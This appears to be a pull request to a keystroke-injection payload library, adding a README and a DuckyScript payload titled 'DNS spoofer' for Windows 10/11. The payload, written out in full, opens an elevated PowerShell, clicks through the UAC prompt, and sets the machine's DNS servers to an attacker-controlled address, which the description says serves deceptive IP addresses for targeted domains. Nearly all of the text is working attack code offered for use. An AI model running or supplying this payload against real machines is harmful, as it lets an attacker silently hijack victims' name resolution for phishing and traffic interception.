### PR TITLE
DNS spoofer

### DIFF
--- a/payloads/library/execution/DNS_spoofer/README.md
+++ b/payloads/library/execution/DNS_spoofer/README.md
@@ -1,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

--- a/payloads/library/execution/DNS_spoofer/payload.txt
+++ b/payloads/library/execution/DNS_spoofer/payload.txt
@@ -1,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE


### PR DESCRIPTION
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.